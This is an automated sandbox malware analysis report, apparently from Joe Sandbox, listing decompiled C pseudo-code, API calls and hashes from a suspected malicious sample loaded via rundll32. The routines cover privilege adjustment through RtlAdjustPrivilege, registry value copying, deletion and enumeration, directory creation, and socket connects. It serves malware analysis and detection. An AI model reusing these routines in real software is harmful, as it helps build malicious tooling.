                                                            					_push(_t14);
                                                            					_push(_t23);
                                                            					E04631C60( *_t6);
                                                            					LocalFree(_t23);
                                                            				}
                                                            				return _t24;
                                                            			}















                                                            0x046441c0
                                                            0x046441c4
                                                            0x046441cb
                                                            0x046441d3
                                                            0x046441d9
                                                            0x046441dc
                                                            0x046441ea
                                                            0x046441ed
                                                            0x046441ff
                                                            0x04644207
                                                            0x04644217
                                                            0x04644209
                                                            0x04644209
                                                            0x04644213
                                                            0x04644213
                                                            0x04644221
                                                            0x04644225
                                                            0x04644228
                                                            0x0464422e
                                                            0x0464422f
                                                            0x04644232
                                                            0x04644234
                                                            0x04644235
                                                            0x04644236
                                                            0x0464423c
                                                            0x0464423c
                                                            0x04644248

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 046441DF
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 046441F3
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 046441FF
                                                            • LocalSize.KERNEL32(00000000), ref: 04644228
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 0464423C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AddressCreateEventFreeLibraryLoadProcSize
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3057455304-64178277
                                                            • Opcode ID: b91fcc0198dfb431f1d7e9267994d65ca75f443ad5cd80632f7eacdd350504c9
                                                            • Instruction ID: 6bc39930c3cf0fab36ea858b0c4bc5be52ea02f3f8d56e3af2736367b067171b
                                                            • Opcode Fuzzy Hash: b91fcc0198dfb431f1d7e9267994d65ca75f443ad5cd80632f7eacdd350504c9
                                                            • Instruction Fuzzy Hash: C8017171280301BBE7185FA6DC4AF6B7AA8EB95B50F00441DF2499B280FFB5B840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E046459C0(void* __ecx) {
                                                            				char _v8;
                                                            				intOrPtr _v12;
                                                            				char _v44;
                                                            				_Unknown_base(*)()* _t10;
                                                            				intOrPtr _t13;
                                                            				_Unknown_base(*)()* _t15;
                                                            				void* _t19;
                                                            
                                                            				_t19 = __ecx;
                                                            				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t10 == 0) {
                                                            					L6:
                                                            					return 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v12 = 0;
                                                            					asm("movups [ebp-0x28], xmm0");
                                                            					asm("movups [ebp-0x18], xmm0");
                                                            					 *_t10( &_v44);
                                                            					_t13 = _v44;
                                                            					if(_t13 == 6 || _t13 == 9) {
                                                            						_v8 = 0;
                                                            						_t15 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            						if(_t15 != 0) {
                                                            							 *_t15(_t19,  &_v8);
                                                            						}
                                                            						return 0 | _v8 == 0x00000000;
                                                            					} else {
                                                            						goto L6;
                                                            					}
                                                            				}
                                                            			}










                                                            0x046459d1
                                                            0x046459da
                                                            0x046459e2
                                                            0x04645a41
                                                            0x04645a47
                                                            0x046459e4
                                                            0x046459e4
                                                            0x046459e7
                                                            0x046459f2
                                                            0x046459f6
                                                            0x046459fa
                                                            0x046459fc
                                                            0x04645a03
                                                            0x04645a15
                                                            0x04645a23
                                                            0x04645a2b
                                                            0x04645a32
                                                            0x04645a32
                                                            0x04645a40
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04645a03

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000,?,?,?,?,?,?,?,?,?,04645AE3,?,?,00000000), ref: 046459D3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046459DA
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04645A1C
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645A23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                            • API String ID: 2574300362-3073145729
                                                            • Opcode ID: 5f70d80e508e4b80e1b7eec346dc99e718a26cfe5c0fb2fda168cbb23599392d
                                                            • Instruction ID: bc7948845007f5be9b4c9d567acb94da691311189e0ecc6ff69043d3673391b6
                                                            • Opcode Fuzzy Hash: 5f70d80e508e4b80e1b7eec346dc99e718a26cfe5c0fb2fda168cbb23599392d
                                                            • Instruction Fuzzy Hash: BC01DF32E45309ABDF04DFF0DC8DAAE7B78EB98211F106659F909A2140FA75AAC4C751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04634670(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                            				signed char _t21;
                                                            				signed int _t27;
                                                            				signed int _t28;
                                                            				WCHAR* _t30;
                                                            				void* _t37;
                                                            				WCHAR* _t38;
                                                            				signed int _t39;
                                                            				WCHAR* _t40;
                                                            				WCHAR* _t41;
                                                            				WCHAR* _t42;
                                                            
                                                            				_t37 = __ecx;
                                                            				_t41 = _a4;
                                                            				_push(2 + lstrlenW(_t41) * 2);
                                                            				_t40 = E0465EF79(_t37);
                                                            				if(_t40 != 0) {
                                                            					lstrcpyW(_t40, _t41);
                                                            					_t42 = _t40;
                                                            					if( *_t40 != 0x5c || _t40[1] != 0x5c) {
                                                            						if(_t40[1] == 0x3a) {
                                                            							_t27 = _t40[2] & 0x0000ffff;
                                                            							_t11 =  &(_t40[2]); // 0x4
                                                            							_t42 = _t11;
                                                            							if(_t27 != 0 && _t27 == 0x5c) {
                                                            								_t42 =  &(_t42[1]);
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t28 = _t40[2] & 0x0000ffff;
                                                            						_t6 =  &(_t40[2]); // 0x4
                                                            						_t38 = _t6;
                                                            						if(_t28 != 0) {
                                                            							while(_t28 != 0x5c) {
                                                            								_t38 = CharNextW(_t38);
                                                            								_t28 =  *_t38 & 0x0000ffff;
                                                            								if(_t28 != 0) {
                                                            									continue;
                                                            								}
                                                            								goto L7;
                                                            							}
                                                            						}
                                                            						L7:
                                                            						_t7 =  &(_t38[1]); // 0x2
                                                            						_t30 =  ==  ? _t38 : _t7;
                                                            						if( *_t30 != 0) {
                                                            							_t39 =  *_t30 & 0x0000ffff;
                                                            							while(_t39 != 0x5c) {
                                                            								_t30 = CharNextW(_t30);
                                                            								_t39 =  *_t30 & 0x0000ffff;
                                                            								if(_t39 != 0) {
                                                            									continue;
                                                            								}
                                                            								goto L11;
                                                            							}
                                                            						}
                                                            						L11:
                                                            						_t8 =  &(_t30[1]); // 0x2
                                                            						_t42 =  ==  ? _t30 : _t8;
                                                            					}
                                                            					if( *_t42 == 0) {
                                                            						L26:
                                                            						L0465ED17(_t40);
                                                            						return 1;
                                                            					} else {
                                                            						do {
                                                            							if( *_t42 != 0x5c) {
                                                            								goto L25;
                                                            							} else {
                                                            								 *_t42 = 0;
                                                            								_t21 = GetFileAttributesW(_t40);
                                                            								if(_t21 != 0xffffffff) {
                                                            									if((_t21 & 0x00000010) == 0) {
                                                            										goto L22;
                                                            									} else {
                                                            										goto L24;
                                                            									}
                                                            								} else {
                                                            									if(CreateDirectoryW(_t40, 0) != 0 || GetLastError() == 0xb7) {
                                                            										L24:
                                                            										 *_t42 = 0x5c;
                                                            										goto L25;
                                                            									} else {
                                                            										L22:
                                                            										L0465ED17(_t40);
                                                            										return 0;
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L27;
                                                            							L25:
                                                            							_t42 = CharNextW(_t42);
                                                            						} while ( *_t42 != 0);
                                                            						goto L26;
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            				L27:
                                                            			}













                                                            0x04634670
                                                            0x04634674
                                                            0x04634686
                                                            0x0463468c
                                                            0x04634693
                                                            0x046346a0
                                                            0x046346aa
                                                            0x046346b2
                                                            0x04634712
                                                            0x04634714
                                                            0x04634718
                                                            0x04634718
                                                            0x0463471e
                                                            0x04634725
                                                            0x04634725
                                                            0x0463471e
                                                            0x046346bb
                                                            0x046346bb
                                                            0x046346bf
                                                            0x046346bf
                                                            0x046346c5
                                                            0x046346c7
                                                            0x046346d0
                                                            0x046346d2
                                                            0x046346d8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046346d8
                                                            0x046346c7
                                                            0x046346da
                                                            0x046346de
                                                            0x046346e1
                                                            0x046346e8
                                                            0x046346ea
                                                            0x046346f0
                                                            0x046346f7
                                                            0x046346f9
                                                            0x046346ff
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046346ff
                                                            0x046346f0
                                                            0x04634701
                                                            0x04634705
                                                            0x04634708
                                                            0x04634708
                                                            0x0463472c
                                                            0x0463478a
                                                            0x0463478b
                                                            0x04634799
                                                            0x04634730
                                                            0x04634730
                                                            0x04634734
                                                            0x00000000
                                                            0x04634736
                                                            0x04634739
                                                            0x0463473c
                                                            0x04634745
                                                            0x04634775
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634747
                                                            0x04634752
                                                            0x04634777
                                                            0x0463477c
                                                            0x00000000
                                                            0x04634761
                                                            0x04634761
                                                            0x04634762
                                                            0x04634770
                                                            0x04634770
                                                            0x04634752
                                                            0x04634745
                                                            0x00000000
                                                            0x0463477f
                                                            0x04634782
                                                            0x04634784
                                                            0x00000000
                                                            0x04634730
                                                            0x04634696
                                                            0x0463469a
                                                            0x0463469a
                                                            0x00000000

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,0463572D,?,?,?,?), ref: 04634679
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 046346A0
                                                            • CharNextW.USER32(00000004), ref: 046346CE
                                                            • CharNextW.USER32(00000006), ref: 046346F7
                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0463473C
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0463474A
                                                            • GetLastError.KERNEL32 ref: 04634754
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 227312388-0
                                                            • Opcode ID: abac3ddf42d50555acb8cc836e41db4e2a2ba991e5cd9e1db1192322ea3124d4
                                                            • Instruction ID: fb8683cf477f2c35a12392e27f54107d70f543aeb35cdacd1f0e2aba020f2ad7
                                                            • Opcode Fuzzy Hash: abac3ddf42d50555acb8cc836e41db4e2a2ba991e5cd9e1db1192322ea3124d4
                                                            • Instruction Fuzzy Hash: 4C3126719002519ADF242F65E8486B6F3F8FF63367B50412EE84883290FF76B881C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04640A80(void* __ebx, void* __ecx, short* __edx, short* _a4, short* _a8) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				int _v16;
                                                            				void* __esi;
                                                            				int* _t25;
                                                            				void* _t26;
                                                            				int _t34;
                                                            				int _t37;
                                                            				long _t39;
                                                            				char* _t41;
                                                            				short* _t43;
                                                            				int* _t47;
                                                            				void* _t49;
                                                            
                                                            				_t45 = __ecx;
                                                            				_v8 = 0;
                                                            				_t47 = 0;
                                                            				_v16 = 0;
                                                            				_v12 = 0;
                                                            				_t48 = 0;
                                                            				_t25 = RegOpenKeyExW(__ecx, __edx, 0, 0x103,  &_v8);
                                                            				if(_t25 != 0) {
                                                            					L11:
                                                            					_t26 = _v8;
                                                            					if(_t26 != 0) {
                                                            						RegCloseKey(_t26);
                                                            					}
                                                            					if(_t48 != 0) {
                                                            						L04655B0F(_t48);
                                                            					}
                                                            					return _t47;
                                                            				}
                                                            				_t43 = _a8;
                                                            				if(RegQueryValueExW(_v8, _t43, _t25, _t25, _t25, _t25) != 2 || RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                            					L10:
                                                            					goto L11;
                                                            				} else {
                                                            					_t34 = _v12;
                                                            					_t54 = _t34;
                                                            					if(_t34 != 0) {
                                                            						_push(_t34);
                                                            						_t41 = L04655B55(_t45, 0, _t54);
                                                            						_t49 = _t49 + 4;
                                                            						_t48 = _t41;
                                                            					}
                                                            					_t37 = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t48,  &_v12);
                                                            					if(_t37 == 0 && RegSetValueExW(_v8, _t43, _t37, _v16, _t48, _v12) == 0) {
                                                            						_t39 = RegDeleteValueW(_v8, _a4);
                                                            						if(_t39 != 0) {
                                                            							RegDeleteValueW(_v8, _t43);
                                                            						} else {
                                                            							_t21 = _t39 + 1; // 0x1
                                                            							_t47 = _t21;
                                                            						}
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            			}
















                                                            0x04640a80
                                                            0x04640a8b
                                                            0x04640a98
                                                            0x04640a9a
                                                            0x04640aa4
                                                            0x04640aab
                                                            0x04640aad
                                                            0x04640ab5
                                                            0x04640b4f
                                                            0x04640b4f
                                                            0x04640b54
                                                            0x04640b57
                                                            0x04640b57
                                                            0x04640b5f
                                                            0x04640b62
                                                            0x04640b67
                                                            0x04640b71
                                                            0x04640b71
                                                            0x04640abc
                                                            0x04640ad0
                                                            0x04640b4e
                                                            0x00000000
                                                            0x04640aec
                                                            0x04640aec
                                                            0x04640aef
                                                            0x04640af1
                                                            0x04640af3
                                                            0x04640af4
                                                            0x04640af9
                                                            0x04640afc
                                                            0x04640afc
                                                            0x04640b0f
                                                            0x04640b17
                                                            0x04640b35
                                                            0x04640b3d
                                                            0x04640b48
                                                            0x04640b3f
                                                            0x04640b3f
                                                            0x04640b3f
                                                            0x04640b3f
                                                            0x04640b3d
                                                            0x00000000
                                                            0x04640b17

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04640AAD
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640AC7
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640AE2
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B0F
                                                            • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B25
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B35
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B48
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04640B57
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value$Query$Delete$CloseOpen
                                                            • String ID:
                                                            • API String ID: 2816288289-0
                                                            • Opcode ID: 97782468a7b238a2b4a9001f80cb38957870cc23f647999e46cf3145eda608d2
                                                            • Instruction ID: 78609b45f8ed8a31b7eda9f687b9b09ff44565c0fe9ceb7fc30798d215350963
                                                            • Opcode Fuzzy Hash: 97782468a7b238a2b4a9001f80cb38957870cc23f647999e46cf3145eda608d2
                                                            • Instruction Fuzzy Hash: 4B310FB5A00118BFEF119FA1DD48EAEBB7DEB44744F104054FA05E2110F735AF549B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 16%
                                                            			E0464F0B0(void* __eax, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                            				intOrPtr _t14;
                                                            				long _t19;
                                                            				intOrPtr _t21;
                                                            				intOrPtr* _t31;
                                                            
                                                            				_t31 = __ecx;
                                                            				if(_a8 == 0) {
                                                            					_t14 = _a4;
                                                            					_t24 =  !=  ? 0x1c : 0x10;
                                                            					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t14,  !=  ? 0x1c : 0x10);
                                                            					if(_t14 == 0xffffffff) {
                                                            						goto L10;
                                                            					} else {
                                                            						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                            						if(_t14 == 0xffffffff) {
                                                            							goto L10;
                                                            						} else {
                                                            							 *((intOrPtr*)(__ecx + 0x4c)) = 1;
                                                            							 *((intOrPtr*)(__ecx + 0x50)) = 1;
                                                            							SetLastError(0);
                                                            							if( *((intOrPtr*)( *_t31 + 0x7c))() != 2) {
                                                            								goto L5;
                                                            							} else {
                                                            								_t19 = GetLastError();
                                                            								_t20 =  ==  ? 0x4c7 : _t19;
                                                            								__imp__#112( ==  ? 0x4c7 : _t19);
                                                            								goto L10;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                            					if(__eax == 0xffffffff) {
                                                            						L10:
                                                            						return 0;
                                                            					} else {
                                                            						_t21 = _a4;
                                                            						_t28 =  !=  ? 0x1c : 0x10;
                                                            						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t21,  !=  ? 0x1c : 0x10);
                                                            						if(_t21 == 0) {
                                                            							L5:
                                                            							return 1;
                                                            						} else {
                                                            							if(_t21 != 0xffffffff) {
                                                            								goto L10;
                                                            							} else {
                                                            								__imp__#111();
                                                            								if(_t21 != 0x2733) {
                                                            									goto L10;
                                                            								} else {
                                                            									goto L5;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}







                                                            0x0464f0b8
                                                            0x0464f0ba
                                                            0x0464f116
                                                            0x0464f127
                                                            0x0464f12f
                                                            0x0464f138
                                                            0x00000000
                                                            0x0464f13a
                                                            0x0464f142
                                                            0x0464f14b
                                                            0x00000000
                                                            0x0464f14d
                                                            0x0464f14d
                                                            0x0464f156
                                                            0x0464f15d
                                                            0x0464f16d
                                                            0x00000000
                                                            0x0464f16f
                                                            0x0464f16f
                                                            0x0464f17c
                                                            0x0464f180
                                                            0x00000000
                                                            0x0464f180
                                                            0x0464f16d
                                                            0x0464f14b
                                                            0x0464f0bc
                                                            0x0464f0c4
                                                            0x0464f0cd
                                                            0x0464f186
                                                            0x0464f18a
                                                            0x0464f0d3
                                                            0x0464f0d3
                                                            0x0464f0e4
                                                            0x0464f0ec
                                                            0x0464f0f4
                                                            0x0464f10c
                                                            0x0464f113
                                                            0x0464f0f6
                                                            0x0464f0f9
                                                            0x00000000
                                                            0x0464f0ff
                                                            0x0464f0ff
                                                            0x0464f10a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f10a
                                                            0x0464f0f9
                                                            0x0464f0f4
                                                            0x0464f0cd

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 0464F0C4
                                                            • connect.WS2_32(?,?,00000010), ref: 0464F0EC
                                                            • WSAGetLastError.WS2_32 ref: 0464F0FF
                                                            • connect.WS2_32(?,?,00000010), ref: 0464F12F
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464F142
                                                            • SetLastError.KERNEL32(00000000), ref: 0464F15D
                                                            • GetLastError.KERNEL32 ref: 0464F16F
                                                            • WSASetLastError.WS2_32(00000000), ref: 0464F180
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EventSelectconnect
                                                            • String ID:
                                                            • API String ID: 371153081-0
                                                            • Opcode ID: fe00907668ebc08f86f77bbdc86b42b0b940e7a59b4d2b414db7d1d3f25e852e
                                                            • Instruction ID: 2dbc40bf47dff682011528dd3213a019342437a3f2af06dec8c6b92277629a23
                                                            • Opcode Fuzzy Hash: fe00907668ebc08f86f77bbdc86b42b0b940e7a59b4d2b414db7d1d3f25e852e
                                                            • Instruction Fuzzy Hash: BF214F30200600AFEB285F64E84CB6677A5EB55321F208B19F556C76E0EBB9EC519F50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E04641680(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				short* _v532;
                                                            				short* _v536;
                                                            				short* _v540;
                                                            				void* _v544;
                                                            				int _v548;
                                                            				int _v552;
                                                            				void* _v556;
                                                            				short* _v560;
                                                            				intOrPtr _v564;
                                                            				signed int _t61;
                                                            				short* _t64;
                                                            				short* _t73;
                                                            				int* _t83;
                                                            				intOrPtr* _t84;
                                                            				void* _t102;
                                                            				int _t103;
                                                            				void** _t105;
                                                            				short** _t110;
                                                            				intOrPtr _t113;
                                                            				void* _t117;
                                                            				short* _t120;
                                                            				short* _t121;
                                                            				void* _t122;
                                                            				short* _t125;
                                                            				short* _t126;
                                                            				void* _t128;
                                                            				intOrPtr* _t129;
                                                            				intOrPtr _t131;
                                                            				short* _t132;
                                                            				void* _t134;
                                                            				signed int _t137;
                                                            				void* _t138;
                                                            				void* _t139;
                                                            
                                                            				_t61 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t61 ^ _t137;
                                                            				_t131 = _a8;
                                                            				_t119 = _a4;
                                                            				_v564 = __ecx;
                                                            				_v532 = 0;
                                                            				_t105 = _a4 + 1;
                                                            				_t64 = _t131 - 1 + _t105;
                                                            				_v536 = _t105;
                                                            				_v540 = _t64;
                                                            				if(_t64 - _t105 >= 4) {
                                                            					_t102 =  *_t105;
                                                            					_v536 =  &(_t105[1]);
                                                            				} else {
                                                            					_v532 = 1;
                                                            					_t102 = 0;
                                                            				}
                                                            				_v560 = E04640D20( &_v540);
                                                            				if(_v532 != 0) {
                                                            					L20:
                                                            					return E04655AFE(_v8 ^ _t137);
                                                            				} else {
                                                            					_t110 =  &_v540;
                                                            					_v548 = 0;
                                                            					_v532 = 0;
                                                            					_v540 = 0;
                                                            					_v536 = 0;
                                                            					E0463B9C0(_t110, _t131);
                                                            					_t120 = _v536;
                                                            					E0465E060(_t120, _t119, _t131);
                                                            					_t139 = _t138 + 0xc;
                                                            					_t121 = _t120 + _t131;
                                                            					_v536 = _t121;
                                                            					if(RegOpenKeyExW(_t102, _v560, 0, 0x20119,  &_v544) != 0) {
                                                            						L13:
                                                            						_t72 = _v560;
                                                            						if(_v560 != 0) {
                                                            							L04655B0F(_t72);
                                                            							_t139 = _t139 + 4;
                                                            						}
                                                            						_t132 = _v540;
                                                            						if(_t132 != 0) {
                                                            							_t122 = _t121 - _t132;
                                                            							_t73 = _t132;
                                                            						} else {
                                                            							_t122 = 0;
                                                            							_t73 = 0;
                                                            						}
                                                            						_push(_t110);
                                                            						_push(0x3f);
                                                            						_push(_t122);
                                                            						_push(_t73);
                                                            						E04631C60( *((intOrPtr*)(_v564 + 4)));
                                                            						if(_t132 != 0) {
                                                            							L04655B0F(_t132);
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					_t103 = 0;
                                                            					_v552 = 0x104;
                                                            					if(RegEnumKeyExW(_v544, 0,  &_v528,  &_v552, 0, 0, 0, 0) != 0) {
                                                            						L12:
                                                            						RegCloseKey(_v544);
                                                            						goto L13;
                                                            					}
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_v548 = 0;
                                                            						_t103 = _t103 + 1;
                                                            						_t83 = RegOpenKeyExW(_v544,  &_v528, 0, 0x20119,  &_v556);
                                                            						if(_t83 == 0) {
                                                            							RegQueryInfoKeyW(_v556, 0, 0, 0,  &_v548, _t83, _t83, _t83, _t83, _t83, _t83, _t83);
                                                            							RegCloseKey(_v556);
                                                            						}
                                                            						_t84 =  &_v528;
                                                            						_t117 = _t84 + 2;
                                                            						do {
                                                            							_t113 =  *_t84;
                                                            							_t84 = _t84 + 2;
                                                            						} while (_t113 != 0);
                                                            						_t134 = 2 + (_t84 - _t117 >> 1) * 2;
                                                            						_t124 =  ==  ? 0 : _t121 - _v540;
                                                            						E0463B9C0( &_v540, ( ==  ? 0 : _t121 - _v540) + _t134);
                                                            						_t125 = _v536;
                                                            						E0465E060(_t125,  &_v528, _t134);
                                                            						_t126 = _t125 + _t134;
                                                            						_v536 = _t126;
                                                            						_t139 = _t139 + 0xc;
                                                            						_t128 =  ==  ? 0 : _t126 - _v540;
                                                            						_t110 =  &_v540;
                                                            						_t48 = _t128 + 4; // 0x4
                                                            						E0463B9C0(_t110, _t48);
                                                            						_t129 = _v536;
                                                            						 *_t129 = _v548;
                                                            						_t121 = _t129 + 4;
                                                            						_v552 = 0x104;
                                                            						_v536 = _t121;
                                                            					} while (RegEnumKeyExW(_v544, _t103,  &_v528,  &_v552, 0, 0, 0, 0) == 0);
                                                            					goto L12;
                                                            				}
                                                            			}






































                                                            0x04641689
                                                            0x04641690
                                                            0x04641695
                                                            0x04641699
                                                            0x0464169c
                                                            0x046416a5
                                                            0x046416af
                                                            0x046416b2
                                                            0x046416b4
                                                            0x046416ba
                                                            0x046416c5
                                                            0x046416d5
                                                            0x046416da
                                                            0x046416c7
                                                            0x046416c7
                                                            0x046416d1
                                                            0x046416d1
                                                            0x046416f2
                                                            0x046416f8
                                                            0x04641923
                                                            0x04641933
                                                            0x046416fe
                                                            0x046416ff
                                                            0x04641705
                                                            0x0464170f
                                                            0x04641719
                                                            0x04641723
                                                            0x0464172d
                                                            0x04641734
                                                            0x0464173b
                                                            0x04641740
                                                            0x04641749
                                                            0x0464174b
                                                            0x04641768
                                                            0x046418dc
                                                            0x046418dc
                                                            0x046418e4
                                                            0x046418e7
                                                            0x046418ec
                                                            0x046418ec
                                                            0x046418ef
                                                            0x046418f7
                                                            0x046418ff
                                                            0x04641901
                                                            0x046418f9
                                                            0x046418f9
                                                            0x046418fb
                                                            0x046418fb
                                                            0x04641903
                                                            0x0464190a
                                                            0x0464190c
                                                            0x0464190d
                                                            0x04641911
                                                            0x04641918
                                                            0x0464191b
                                                            0x04641920
                                                            0x00000000
                                                            0x04641918
                                                            0x0464176e
                                                            0x04641770
                                                            0x046417a1
                                                            0x046418d4
                                                            0x046418da
                                                            0x00000000
                                                            0x046418da
                                                            0x046417a7
                                                            0x046417b0
                                                            0x046417b6
                                                            0x046417ce
                                                            0x046417d6
                                                            0x046417de
                                                            0x046417fa
                                                            0x04641806
                                                            0x04641806
                                                            0x04641808
                                                            0x0464180e
                                                            0x04641811
                                                            0x04641811
                                                            0x04641814
                                                            0x04641817
                                                            0x04641822
                                                            0x04641833
                                                            0x04641840
                                                            0x04641845
                                                            0x04641854
                                                            0x0464185f
                                                            0x04641869
                                                            0x0464186f
                                                            0x04641876
                                                            0x04641879
                                                            0x0464187f
                                                            0x04641883
                                                            0x04641888
                                                            0x046418a3
                                                            0x046418ad
                                                            0x046418b0
                                                            0x046418ba
                                                            0x046418cc
                                                            0x00000000
                                                            0x046417b0

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04641760
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000000,00020119,?), ref: 04641793
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,?,?,00000000,00020119,?), ref: 046417D6
                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00020119), ref: 046417FA
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04641806
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000104,00000000,00000000,00000000,00000000,00000004,00000000,00020119,?), ref: 046418C0
